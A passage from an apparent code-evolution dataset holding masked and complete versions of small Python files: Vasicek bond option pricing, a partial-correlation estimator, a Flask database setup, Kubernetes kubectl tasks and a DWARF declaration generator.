"step-2": "<mask token>\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n\n def get_TheoreticalP(self, x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * x)) / a\n A = np.exp((B - x) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2 - sigma **\n 2 * B ** 2 / (4 * a))\n self.B = B\n self.A = A\n self.sim_p = A * np.exp(-B * x)\n self.r = -1 * np.log(self.sim_p) / x\n return self.r\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n\n def solve(self, x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss, x0=x0)\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n\n def get_TheoreticalP(self, x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * x)) / a\n A = np.exp((B - x) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2 - sigma **\n 2 * B ** 2 / (4 * a))\n self.B = B\n self.A = A\n self.sim_p = A * np.exp(-B * x)\n self.r = -1 * np.log(self.sim_p) / x\n return self.r\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n\n def solve(self, x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss, x0=x0)\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n\n def get_price_rate(self, T, r):\n sigma = list(self.sigma)[T]\n T = self.t[T]\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * T)) / a\n A = np.exp((B - T) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2\n ) - sigma ** 2 * B ** 2 / (4 * a)\n p = A * np.exp(-B * r)\n r = -1 * np.log(p) / T\n return p, r\n\n\n<mask token>\n",
"step-4": "from functions2 import *\nimport numpy as np\nimport numpy as np\nimport math\nfrom scipy import optimize\nimport pylab as pl\nfrom IPython import display as dp\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n\n def get_TheoreticalP(self, x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * x)) / a\n A = np.exp((B - x) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2 - sigma **\n 2 * B ** 2 / (4 * a))\n self.B = B\n self.A = A\n self.sim_p = A * np.exp(-B * x)\n self.r = -1 * np.log(self.sim_p) / x\n return self.r\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n\n def solve(self, x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss, x0=x0)\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n\n def get_price_rate(self, T, r):\n sigma = list(self.sigma)[T]\n T = self.t[T]\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * T)) / a\n A = np.exp((B - T) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2\n ) - sigma ** 2 * B ** 2 / (4 * a)\n p = A * np.exp(-B * r)\n r = -1 * np.log(p) / T\n return p, r\n\n\ndef option_pricing(V, r, t, T, X):\n time_dict = dict(zip(V.t, np.arange(len(V.t))))\n r = r[-1:][t].item()\n P = V.get_price_rate(time_dict[T], r)\n p = V.get_price_rate(time_dict[t], r)\n sigmap = V.sigma[t] * (1 / V.a) * (1 / np.sqrt(t)) * (1 - np.exp(-V.a *\n (T - t))) * np.sqrt((1 - np.exp(-2 * V.a * t)) / (2 * V.a))\n d = 1 / sigmap * np.log(P[0] / (p[0] * X)) + 0.5 * sigmap\n c = P[0] * norm.cdf(d) - X * p[0] * norm.cdf(d - sigmap)\n return c\n",
"step-5": "from functions2 import *\nimport numpy as np\n#from functions import TermStructure,load_data\nimport numpy as np\nimport math\nfrom scipy import optimize\nimport pylab as pl\nfrom IPython import display as dp\n\n\n\n\nclass Vasicek():\n def __init__(self,rs,vol):\n self.t = rs.columns\n self.ps= rs[-1:]\n self.sigma = vol \n \n def get_TheoreticalP(self,x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n \n a = self.a\n b = self.b\n B = (1-np.exp(-a*x))/a\n A = np.exp(((B-x)*(a**2*b-(sigma**2)/2))/a**2-(sigma**2*B**2)/(4*a))\n self.B=B\n self.A=A\n self.sim_p = A*np.exp(-B*x)\n self.r = -1*np.log(self.sim_p)/x\n return self.r\n\n \n def loss(self,x):\n self.a = x[0]\n self.b = x[1] \n self.sim_rs = apply(self.get_TheoreticalP,self.ps)\n loss = np.array(self.ps.as_matrix())-np.array(self.sim_rs)\n\n loss = 10000*np.sum(loss**2)\n \n return loss\n\n \n def solve(self,x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss,x0=x0)#,tol=1e-10,method='Nelder-Mead',options={'maxiter':1800})\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n \n def get_price_rate(self,T,r):\n \n sigma = list(self.sigma)[T]\n T = self.t[T]\n a = self.a\n b = self.b\n B = (1-np.exp(-a*T))/a\n A = np.exp(((B-T)*(a**2*b-(sigma**2)/2))/a**2)-(sigma**2*B**2)/(4*a)\n p = A*np.exp(-B*r)\n r = -1*np.log(p)/T\n return p,r\n\n\ndef option_pricing(V,r,t,T,X):\n #print('Expiration: {}'.format(t))\n #print('Maturity: {}'.format(T))\n \n time_dict = dict(zip(V.t,np.arange(len(V.t))))\n \n r = r[-1:][t].item()\n \n P = V.get_price_rate(time_dict[T],r)\n \n p = V.get_price_rate(time_dict[t],r)\n \n\n \n sigmap = V.sigma[t]*(1/V.a)*(1/np.sqrt(t))*(1-np.exp(-V.a*(T-t)))*np.sqrt((1-np.exp(-2*V.a*t))/(2*V.a))\n \n d = (1/sigmap)*np.log(P[0]/(p[0]*X))+0.5*sigmap\n \n c = P[0]*norm.cdf(d)-X*p[0]*norm.cdf(d-sigmap)\n \n return c",
"step-ids": [
3,
5,
6,
8,
9
]
}
|
[
3,
5,
6,
8,
9
] |
"""David's first approach when I exposed the problem.
Reasonable to add in the comparison?
"""
import numpy as np
from sklearn.linear_model import RidgeCV
from sklearn.model_selection import ShuffleSplit
def correlation(x, y):
a = (x - x.mean(0)) / x.std(0)
b = (y - y.mean(0)) / y.std(0)
return a.T @ b / x.shape[0]
def partial_correlation_bagging(solver, x, y, z, ensemble=None):
if ensemble is None:
ensemble = [(range(len(x)), range(len(x))), ]
r = []
for set1, set2 in ensemble:
p_x = solver.fit(z[set1], x[set1]).predict(z[set2])
p_y = solver.fit(z[set1], y[set1]).predict(z[set2])
r.append(correlation(x[set2] - p_x, y[set2] - p_y))
return np.mean(r, 0)
def partial_correlation_loop(solver, x, y, ensemble=None):
e_hat = np.zeros(y.shape[1])
for i in range(y.shape[1]):
y_i = y[:, i].reshape(-1, 1)
y_not_i = np.delete(y, i, axis=1)
r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)
e_hat[i] = np.sum(r**2)
return e_hat
class PartialCorrelation(object):
def __init__(self, solver=None, bagging=False):
self.solver = RidgeCV() if solver is None else solver
self.bagging = bagging
def fit(self, X, Y):
ensemble = None
if self.bagging:
cv = ShuffleSplit(test_size=.5)
ensemble = [(train, test) for train, test in cv.split(X, Y)]
self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)
return self
if __name__ == '__main__':
from sklearn.preprocessing import scale
from sklearn.metrics import roc_auc_score
# Simulate data
"""Y = F(EX+N)"""
np.random.seed(0)
# Problem dimensionality
n = 1000
nE = nX = 10
nY = 10
snr = 25 # signal to noise ratio
selected = .5 # number of X feature selected by E
selected = min(int(np.floor(selected*nX)) + 1, nX-1)
E = np.identity(nX)
E[selected:] = 0
# X covariance
Cx = np.random.randn(nX, nX)
Cx = Cx.dot(Cx.T) / nX # sym pos-semidefin
X = np.random.multivariate_normal(np.zeros(nX), Cx, n)
# Noise (homosedastic in source space)
N = np.random.randn(n, nE)
# Forward operator (linear mixture)
F = np.random.randn(nY, nE)
Y = ((X @ E.T) * snr + N) @ F.T
X = scale(X)
Y = scale(Y)
# Fit method
partialcorr = PartialCorrelation()
train, test = range(0, n, 2), range(1, n, 2)
E_hat = partialcorr.fit(X[train], Y[train]).E_
# score = partialcorr.score(X[test], Y[test]) # TODO
print('E_auc', roc_auc_score(np.diag(E), E_hat))
|
normal
|
{
"blob_id": "dfd2b515e08f285345c750bf00f6a55f43d60039",
"index": 8379,
"step-1": "<mask token>\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\n<mask token>\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\ndef partial_correlation_bagging(solver, x, y, z, ensemble=None):\n if ensemble is None:\n ensemble = [(range(len(x)), range(len(x)))]\n r = []\n for set1, set2 in ensemble:\n p_x = solver.fit(z[set1], x[set1]).predict(z[set2])\n p_y = solver.fit(z[set1], y[set1]).predict(z[set2])\n r.append(correlation(x[set2] - p_x, y[set2] - p_y))\n return np.mean(r, 0)\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\ndef partial_correlation_bagging(solver, x, y, z, ensemble=None):\n if ensemble is None:\n ensemble = [(range(len(x)), range(len(x)))]\n r = []\n for set1, set2 in ensemble:\n p_x = solver.fit(z[set1], x[set1]).predict(z[set2])\n p_y = solver.fit(z[set1], y[set1]).predict(z[set2])\n r.append(correlation(x[set2] - p_x, y[set2] - p_y))\n return np.mean(r, 0)\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\nif __name__ == '__main__':\n from sklearn.preprocessing import scale\n from sklearn.metrics import roc_auc_score\n \"\"\"Y = F(EX+N)\"\"\"\n np.random.seed(0)\n n = 1000\n nE = nX = 10\n nY = 10\n snr = 25\n selected = 0.5\n selected = min(int(np.floor(selected * nX)) + 1, nX - 1)\n E = np.identity(nX)\n E[selected:] = 0\n Cx = np.random.randn(nX, nX)\n Cx = Cx.dot(Cx.T) / nX\n X = np.random.multivariate_normal(np.zeros(nX), Cx, n)\n N = np.random.randn(n, nE)\n F = np.random.randn(nY, nE)\n Y = (X @ E.T * snr + N) @ F.T\n X = scale(X)\n Y = scale(Y)\n partialcorr = PartialCorrelation()\n train, test = range(0, n, 2), range(1, n, 2)\n E_hat = partialcorr.fit(X[train], Y[train]).E_\n print('E_auc', roc_auc_score(np.diag(E), E_hat))\n",
"step-5": "\"\"\"David's first approach when I exposed the problem.\nReasonable to add in the comparison?\n\"\"\"\nimport numpy as np\nfrom sklearn.linear_model import RidgeCV\nfrom sklearn.model_selection import ShuffleSplit\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\ndef partial_correlation_bagging(solver, x, y, z, ensemble=None):\n if ensemble is None:\n ensemble = [(range(len(x)), range(len(x))), ]\n r = []\n for set1, set2 in ensemble:\n p_x = solver.fit(z[set1], x[set1]).predict(z[set2])\n p_y = solver.fit(z[set1], y[set1]).predict(z[set2])\n r.append(correlation(x[set2] - p_x, y[set2] - p_y))\n return np.mean(r, 0)\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r**2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\nif __name__ == '__main__':\n from sklearn.preprocessing import scale\n from sklearn.metrics import roc_auc_score\n # Simulate data\n \"\"\"Y = F(EX+N)\"\"\"\n\n np.random.seed(0)\n\n # Problem dimensionality\n n = 1000\n nE = nX = 10\n nY = 10\n snr = 25 # signal to noise ratio\n selected = .5 # number of X feature selected by E\n\n selected = min(int(np.floor(selected*nX)) + 1, nX-1)\n E = np.identity(nX)\n E[selected:] = 0\n\n # X covariance\n Cx = np.random.randn(nX, nX)\n Cx = Cx.dot(Cx.T) / nX # sym pos-semidefin\n X = np.random.multivariate_normal(np.zeros(nX), Cx, n)\n\n # Noise (homosedastic in source space)\n N = np.random.randn(n, nE)\n\n # Forward operator (linear mixture)\n F = np.random.randn(nY, nE)\n\n Y = ((X @ E.T) * snr + N) @ F.T\n\n X = scale(X)\n Y = scale(Y)\n\n # Fit method\n partialcorr = PartialCorrelation()\n train, test = range(0, n, 2), range(1, n, 2)\n E_hat = partialcorr.fit(X[train], Y[train]).E_\n # score = partialcorr.score(X[test], Y[test]) # TODO\n\n print('E_auc', roc_auc_score(np.diag(E), E_hat))\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
#!flask/bin/python
from config import SQLALCHEMY_DATABASE_URI
from app.models import Patient, Appointment, PhoneCalls
from app import db
import os.path
db.create_all()
# Patient.generate_fake();
# Appointment.generate_fake();
# PhoneCalls.generate_fake();
Patient.add_patient();
Appointment.add_appointment();
PhoneCalls.add_call();
|
normal
|
{
"blob_id": "173e6017884a1a4df64018b306ea71bcaa1c5f1d",
"index": 4528,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndb.create_all()\nPatient.add_patient()\nAppointment.add_appointment()\nPhoneCalls.add_call()\n",
"step-3": "from config import SQLALCHEMY_DATABASE_URI\nfrom app.models import Patient, Appointment, PhoneCalls\nfrom app import db\nimport os.path\ndb.create_all()\nPatient.add_patient()\nAppointment.add_appointment()\nPhoneCalls.add_call()\n",
"step-4": "#!flask/bin/python\nfrom config import SQLALCHEMY_DATABASE_URI\nfrom app.models import Patient, Appointment, PhoneCalls\nfrom app import db\nimport os.path\ndb.create_all()\n\n# Patient.generate_fake();\n# Appointment.generate_fake();\n# PhoneCalls.generate_fake();\n\nPatient.add_patient();\nAppointment.add_appointment();\nPhoneCalls.add_call();",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
class Task:
def __init__(self):
self.title = ''
self.subtasks = []
def set_title(self, title):
self.title = title
def set_subtasks(self, subtasks):
self.subtasks = subtasks
|
normal
|
{
"blob_id": "3cf2ffbc8163c2a447016c93ff4dd13e410fff2b",
"index": 7353,
"step-1": "<mask token>\n",
"step-2": "class Task:\n <mask token>\n <mask token>\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-3": "class Task:\n\n def __init__(self):\n self.title = ''\n self.subtasks = []\n <mask token>\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-4": "class Task:\n\n def __init__(self):\n self.title = ''\n self.subtasks = []\n\n def set_title(self, title):\n self.title = title\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-5": "# -*- coding: utf-8 -*-\nclass Task:\n def __init__(self):\n self.title = ''\n self.subtasks = []\n\n def set_title(self, title):\n self.title = title\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from plumbum import local, FG, ProcessExecutionError
import logging
import os.path
from task import app
kubectl = local["kubectl"]
@app.task
def create_kube_from_template(file_name, *aargs):
args = {}
for a in aargs:
args.update(a)
template = open(os.path.join('..', file_name)).read() % args
logging.info((kubectl["create", "-f", "-", "--logtostderr"] << template)())
@app.task
def delete_kube_by_name(name):
try:
logging.info((kubectl["delete", name])())
return True
except ProcessExecutionError:
return False
|
normal
|
{
"blob_id": "137e80b3bfdc0dba33a3108b37d21d298a8f251d",
"index": 1544,
"step-1": "<mask token>\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-2": "<mask token>\n\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl['create', '-f', '-', '--logtostderr'] << template)())\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-3": "<mask token>\nkubectl = local['kubectl']\n\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl['create', '-f', '-', '--logtostderr'] << template)())\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-4": "from plumbum import local, FG, ProcessExecutionError\nimport logging\nimport os.path\nfrom task import app\nkubectl = local['kubectl']\n\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl['create', '-f', '-', '--logtostderr'] << template)())\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-5": "from plumbum import local, FG, ProcessExecutionError\nimport logging\nimport os.path\n\nfrom task import app\n\nkubectl = local[\"kubectl\"]\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl[\"create\", \"-f\", \"-\", \"--logtostderr\"] << template)())\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info((kubectl[\"delete\", name])())\n return True\n except ProcessExecutionError:\n return False\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from pointsEau.models import PointEau
from django.contrib.auth.models import User
from rest_framework import serializers
class PointEauSerializer(serializers.ModelSerializer):
class Meta:
model = PointEau
fields = [
'pk',
'nom',
'lat',
'long',
'desc',
'owner'
]
nom = serializers.CharField(max_length=100)
long = serializers.DecimalField(max_digits=10, decimal_places=8)
lat = serializers.DecimalField(max_digits=10, decimal_places=8)
desc = serializers.CharField(max_length=255)
owner = serializers.ReadOnlyField(source='owner.username')
class UserSerializer(serializers.ModelSerializer):
pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=PointEau.objects.all())
class Meta:
model = User
fields = ('id', 'username', 'pointseau')
|
normal
|
{
"blob_id": "51f171b3847b3dbf5657625fdf3b7fe771e0e004",
"index": 4743,
"step-1": "<mask token>\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-2": "<mask token>\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = PointEau\n fields = ['pk', 'nom', 'lat', 'long', 'desc', 'owner']\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-3": "<mask token>\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = PointEau\n fields = ['pk', 'nom', 'lat', 'long', 'desc', 'owner']\n nom = serializers.CharField(max_length=100)\n long = serializers.DecimalField(max_digits=10, decimal_places=8)\n lat = serializers.DecimalField(max_digits=10, decimal_places=8)\n desc = serializers.CharField(max_length=255)\n owner = serializers.ReadOnlyField(source='owner.username')\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-4": "from pointsEau.models import PointEau\nfrom django.contrib.auth.models import User\nfrom rest_framework import serializers\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = PointEau\n fields = ['pk', 'nom', 'lat', 'long', 'desc', 'owner']\n nom = serializers.CharField(max_length=100)\n long = serializers.DecimalField(max_digits=10, decimal_places=8)\n lat = serializers.DecimalField(max_digits=10, decimal_places=8)\n desc = serializers.CharField(max_length=255)\n owner = serializers.ReadOnlyField(source='owner.username')\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-5": "from pointsEau.models import PointEau\nfrom django.contrib.auth.models import User\nfrom rest_framework import serializers\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n class Meta:\n model = PointEau\n fields = [\n 'pk',\n 'nom',\n 'lat',\n 'long',\n 'desc',\n 'owner'\n ]\n nom = serializers.CharField(max_length=100)\n long = serializers.DecimalField(max_digits=10, decimal_places=8)\n lat = serializers.DecimalField(max_digits=10, decimal_places=8)\n desc = serializers.CharField(max_length=255)\n owner = serializers.ReadOnlyField(source='owner.username')\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=PointEau.objects.all())\n\n class Meta:\n model = User\n fields = ('id', 'username', 'pointseau')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
import sys
sys.path.append('./spec')
# FIXME: make the spec file an argument to this script
from dwarf3 import *
def mandatory_fragment(mand):
if mand:
return "mandatory"
else:
return "optional"
def super_attrs(tag):
#sys.stderr.write("Calculating super attrs for %s\n" % tag)
# attrs of all bases, plus super_attrs of all bases
immediate_base_attrs = sum([tag_map.get(base, ([], [], []))[0] \
for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], []) \
+ sum([artificial_tag_map.get(base, ([], [], []))[0] \
for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], [])
base_attrs = sum(map(super_attrs, tag_map.get(tag, ([], [], []))[2]), immediate_base_attrs) + \
sum(map(super_attrs, artificial_tag_map.get(tag, ([], [], []))[2]), [])
#sys.stderr.write("Calculated super attrs for %s as %s\n" % (tag, str([x for x in set(base_attrs)])))
return [x for x in set(base_attrs)] #+ tag_map[tag][0]
def main(argv):
for (tag, (attr_list, children, bases) ) in tags:
print "forward_decl(%s)" % tag
for (tag, (attr_list, children, bases) ) in tags:
print "begin_class(%s, %s, %s)" % (tag, \
'base_initializations(' + ', '.join(["initialize_base(" + base + ")" for base in bases]) + ')', \
', '.join(["declare_base(%s)" % base for base in bases]))
for (attr, mand) in attr_list:
print "\tattr_%s(%s, %s)" % (mandatory_fragment(mand), attr, attr_type_map[attr])
for (attr, mand) in super_attrs(tag):
print "\tsuper_attr_%s(%s, %s)" % (mandatory_fragment(mand), attr, attr_type_map[attr])
for child in children:
print "\tchild_tag(%s)" % child
print "#ifdef extra_decls_%s\n\textra_decls_%s\n#endif" % (tag, tag)
print "end_class(%s)" % tag
# main script
if __name__ == "__main__":
main(sys.argv[1:])
|
normal
|
{
"blob_id": "223d96806631e0d249e8738e9bb7cf5b1f48a8c1",
"index": 4252,
"step-1": "#!/usr/bin/env python\n\nimport sys\n\nsys.path.append('./spec')\n\n# FIXME: make the spec file an argument to this script\nfrom dwarf3 import *\n\ndef mandatory_fragment(mand):\n if mand: \n return \"mandatory\"\n else:\n return \"optional\" \n\ndef super_attrs(tag):\n #sys.stderr.write(\"Calculating super attrs for %s\\n\" % tag)\n # attrs of all bases, plus super_attrs of all bases\n immediate_base_attrs = sum([tag_map.get(base, ([], [], []))[0] \\\n for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], []) \\\n + sum([artificial_tag_map.get(base, ([], [], []))[0] \\\n for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], [])\n base_attrs = sum(map(super_attrs, tag_map.get(tag, ([], [], []))[2]), immediate_base_attrs) + \\\n sum(map(super_attrs, artificial_tag_map.get(tag, ([], [], []))[2]), [])\n #sys.stderr.write(\"Calculated super attrs for %s as %s\\n\" % (tag, str([x for x in set(base_attrs)])))\n return [x for x in set(base_attrs)] #+ tag_map[tag][0]\n\ndef main(argv):\n for (tag, (attr_list, children, bases) ) in tags:\n print \"forward_decl(%s)\" % tag\n for (tag, (attr_list, children, bases) ) in tags:\n print \"begin_class(%s, %s, %s)\" % (tag, \\\n 'base_initializations(' + ', '.join([\"initialize_base(\" + base + \")\" for base in bases]) + ')', \\\n ', '.join([\"declare_base(%s)\" % base for base in bases]))\n for (attr, mand) in attr_list:\n print \"\\tattr_%s(%s, %s)\" % (mandatory_fragment(mand), attr, attr_type_map[attr])\n for (attr, mand) in super_attrs(tag):\n print \"\\tsuper_attr_%s(%s, %s)\" % (mandatory_fragment(mand), attr, attr_type_map[attr])\n for child in children:\n print \"\\tchild_tag(%s)\" % child\n print \"#ifdef extra_decls_%s\\n\\textra_decls_%s\\n#endif\" % (tag, tag)\n print \"end_class(%s)\" % tag\n\n# main script\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
